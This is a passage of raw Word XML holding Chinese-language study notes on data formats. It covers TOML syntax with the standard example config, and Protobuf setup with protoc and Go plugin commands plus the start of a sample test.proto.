        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表格数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E2403" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[[products]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10984116" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>name = "Hammer"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C05B319" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sku = 738594937</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B49236" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4759EA13" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[[products]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75A72E" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9B661B" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[[products]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8DDD8" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>name = "Nail"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34537E9D" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sku = 284758393</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8F8A3B" w14:textId="6C19AD05" w:rsidR="00BE1E60" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>color = "gray"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300F9892" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CB6FB22" w14:textId="38E4E471" w:rsidR="00BE1E60" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等价于：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D333C6F" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A260BD" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "products": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D661A96" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    { "name": "Hammer", "sku": 738594937 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4116C3DC" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    { },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2164A0D2" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    { "name": "Nail", "sku": 284758393, "color": "gray" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7A6039" w14:textId="77777777" w:rsidR="00A0148B" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE2C14" w14:textId="22C49F22" w:rsidR="00EB375F" w:rsidRPr="00516805" w:rsidRDefault="00A0148B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB3914" w14:textId="1748C16C" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="144" w:name="_Toc159779605"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
    </w:p>
    <w:p w14:paraId="2E40BCF5" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>title = "TOML Example"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049DC013" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32DE4DCE" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[owner]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B9475" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>name = "Lance Uppercut"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755AFDF4" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dob = 1979-05-27T07:32:00-08:00 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>日期是一等公民</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECD7559" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1BACF9" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[database]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC7BDE7" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>server = "192.168.1.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCCFAB1" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ports = [ 8001, 8001, 8002 ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBA45D8" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>connection_max = 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B165EBC" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243D4876" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E119B93" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[servers]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648A45E5" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>你可以使用空格、制表符进行缩进，或者根本不缩进。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TOML</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不关心缩进。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A846D2" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  [servers.alpha]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB1BDF4" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ip = "10.0.0.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1276A" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  dc = "eqdc10"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1C508" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30508E3D" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  [servers.beta]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6D74D5" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ip = "10.0.0.2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B27CB7A" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  dc = "eqdc10"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B5AE5C" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EECB40" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>[clients]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F82931" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>data = [ ["gamma", "delta"], [1, 2] ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06513FEE" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760E3C23" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组内可以混入换行符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B261124" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>hosts = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C4076" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "alpha",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F1B30D" w14:textId="77777777" w:rsidR="00516805" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  "omega"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0E3897" w14:textId="6BECB854" w:rsidR="004C452C" w:rsidRDefault="00516805" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73685397" w14:textId="045BC969" w:rsidR="00DE4F9C" w:rsidRDefault="00DE4F9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="504A76DE" w14:textId="53BF058E" w:rsidR="00DE4F9C" w:rsidRDefault="00DE4F9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6244E96F" w14:textId="6221A400" w:rsidR="00DE4F9C" w:rsidRDefault="00DE4F9C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc159779606"/>
      <w:r w:rsidRPr="00DE4F9C">
        <w:lastRenderedPageBreak/>
        <w:t>Protobuf</w:t>
      </w:r>
      <w:r w:rsidR="00504A8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00504A8A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00504A8A">
        <w:t>proto</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
    </w:p>
    <w:p w14:paraId="3442BA94" w14:textId="4A4DC15B" w:rsidR="00DE4F9C" w:rsidRDefault="00DE4F9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FF9D59" w14:textId="61236764" w:rsidR="00DE4F9C" w:rsidRDefault="008052F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="008052F0">
        <w:t>https://zhuanlan.zhihu.com/p/141415216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753B4A7" w14:textId="378F8624" w:rsidR="00D36F6E" w:rsidRPr="00EF230D" w:rsidRDefault="00D36F6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="006A6052">
        <w:t>https://blog.csdn.net/weixin_42117918/article/details/88920221</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F64376D" w14:textId="28B65E7D" w:rsidR="00DE4F9C" w:rsidRDefault="00122B7F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的效率比：</w:t>
      </w:r>
      <w:r w:rsidRPr="00122B7F">
        <w:t>https://github.com/eishay/jvm-serializers/wiki</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D382673" w14:textId="77777777" w:rsidR="00122B7F" w:rsidRDefault="00122B7F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5729BC06" w14:textId="1BE2788C" w:rsidR="008052F0" w:rsidRDefault="000F4610" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000F4610">
        <w:t>https://github.com/52im/protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA97021" w14:textId="6C89C289" w:rsidR="008052F0" w:rsidRDefault="008052F0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BF903FE" w14:textId="1B1B1BCA" w:rsidR="00855322" w:rsidRDefault="00855322" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A05D93D" w14:textId="45A3758A" w:rsidR="00855322" w:rsidRPr="005C6775" w:rsidRDefault="005C6775" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005C6775">
        <w:t>protoc -I=$SRC_DIR --cpp_out=$DST_DIR $SRC_DIR/addressbook.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DFDB64" w14:textId="11CAC183" w:rsidR="00855322" w:rsidRDefault="00855322" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6E8C11" w14:textId="0C1C14EB" w:rsidR="008E45BC" w:rsidRDefault="00D647AC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D647AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D647AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r w:rsidRPr="00D647AC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="008A64C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>protoc --go_out=. test.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E33149" w14:textId="3BE6744B" w:rsidR="008E45BC" w:rsidRDefault="008E45BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1308329F" w14:textId="0BEBA785" w:rsidR="008E45BC" w:rsidRDefault="00732874" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc159779607"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Golang</w:t>
      </w:r>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="313F7181" w14:textId="77777777" w:rsidR="008E45BC" w:rsidRDefault="008E45BC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A45FEB1" w14:textId="1ABA51FA" w:rsidR="00855322" w:rsidRDefault="00732874" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00732874">
        <w:t>https://blog.csdn.net/weixin_42117918/article/details/88920221</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06221F4E" w14:textId="78E7B663" w:rsidR="00855322" w:rsidRDefault="00855322" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B933098" w14:textId="67A5FD41" w:rsidR="00DE4F9C" w:rsidRDefault="00BA28AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>proto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译器：</w:t>
      </w:r>
      <w:r w:rsidRPr="00BA28AB">
        <w:t xml:space="preserve">https://github.com/google/protobuf/releases  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E32068" w14:textId="7D155558" w:rsidR="00DE4F9C" w:rsidRDefault="009E2214" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载插件：</w:t>
      </w:r>
      <w:r w:rsidRPr="009E2214">
        <w:t>go get github.com/golang/protobuf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66711239" w14:textId="212243A2" w:rsidR="00DE4F9C" w:rsidRDefault="00DE4F9C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A896662" w14:textId="69CEDC41" w:rsidR="000C2CD0" w:rsidRDefault="000C2CD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AFDB56C" wp14:editId="0BD98447">
            <wp:extent cx="3466230" cy="3276351"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="62" name="图片 62"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图形用户界面&#10;&#10;描述已自动生成"/>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69240" cy="3279196"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A6A71B" w14:textId="77777777" w:rsidR="000C2CD0" w:rsidRDefault="000C2CD0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357CDA59" w14:textId="6A8DAE5C" w:rsidR="007E33D4" w:rsidRPr="00DC6177" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC6177">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>test.proto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610E6B66" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>syntax="proto3"; //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>版本号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013B23FE" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>package main;  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>包名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E06505" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>enum ClassName{   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>枚举</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F904EEE" w14:textId="77777777" w:rsidR="00DC6177" w:rsidRPr="00F07E72" w:rsidRDefault="00DC6177" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    class1=0;  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>标号</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>必须从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07E72">
        <w:rPr>
